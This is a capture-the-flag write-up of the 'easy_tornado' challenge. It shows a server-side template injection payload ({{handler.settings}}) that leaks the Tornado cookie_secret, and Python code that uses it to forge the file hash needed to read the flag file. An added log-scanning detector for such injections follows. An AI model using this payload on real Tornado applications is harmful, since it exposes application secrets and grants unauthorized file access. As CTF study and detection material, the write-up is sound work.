Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environment ]
Windows
[ Tools ]
Firefox
[ Steps ]
Tornado is a Python web application framework.
Opening the challenge shows three files:

flag.txt
/flag.txt
flag in /fllllllllllllag
This shows that the flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is a rendering function in Python: it renders variables into a template, so different pages can be produced by passing different parameters.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
filehash=md5(cookie_secret+md5(filename)). Here filename=/fllllllllllllag, so knowing cookie_secret is all that is needed to access the flag.
After testing, I found another interface, an error page of the form /error?msg=Error, which is suspected to be open to server-side template injection (SSTI).
Try /error?msg={{datetime}}. In Tornado's page templates, datetime refers to Python's datetime module. Tornado provides some object aliases for quick access to objects; see the official Tornado documentation.

Looking through the documentation shows that cookie_secret is kept in the settings attribute of the Application object, and that self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler refers to the RequestHandler object that handles the current page. RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
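import hashlib

def md5(s):
    # hashlib needs bytes in Python 3, so encode the string first
    h = hashlib.md5()
    h.update(s.encode())
    return h.hexdigest()

def filehash():
    filename = '/fllllllllllllag'
    # cookie_secret as shown in the handler.settings output above
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    # filehash = md5(cookie_secret + md5(filename)), per hints.txt
    return md5(cookie_secret + md5(filename))

print(filehash())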
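The /error?msg= requests used in the steps above leave a recognisable trace in web access logs. The following detection sketch is an added example, not part of the original post: it flags query parameters that carry Tornado template delimiters, including percent-encoded and double-encoded forms. The log lines, their format and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Tornado template delimiters: {{ expr }}, {% stmt %}, {# comment #}
TEMPLATE_MARKER = re.compile(r"\{\{|\{%|\{#")
# Request line inside a common-log-format entry (assumed log format)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for params containing template syntax."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # parse_qsl already decodes once; decode_fully handles further layers
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = decode_fully(value)
        if TEMPLATE_MARKER.search(decoded):
            hits.append((name, decoded))
    return hits

# Constructed sample access-log lines (not taken from a real server)
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Jul/2022:08:01:12 +0000] "GET /error?msg=Error HTTP/1.1" 200 12',
    '10.0.0.5 - - [07/Jul/2022:08:02:40 +0000] "GET /error?msg=%7B%7Bdatetime%7D%7D HTTP/1.1" 200 48',
    '10.0.0.5 - - [07/Jul/2022:08:03:05 +0000] "GET /error?msg=%257B%257Bhandler.settings%257D%257D HTTP/1.1" 200 310',
    '10.0.0.9 - - [07/Jul/2022:08:04:00 +0000] "GET /welcome.txt HTTP/1.1" 200 6',
]

def scan(lines):
    """Return [(line_index, hits)] for every line with at least one hit."""
    return [(i, hits) for i, line in enumerate(lines)
            if (hits := suspicious_params(line))]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(idx, hits)
```

A hit on a parameter that the application echoes into a page, such as msg here, is the signal to check whether the handler compiles user input as template source instead of passing it in as a template variable.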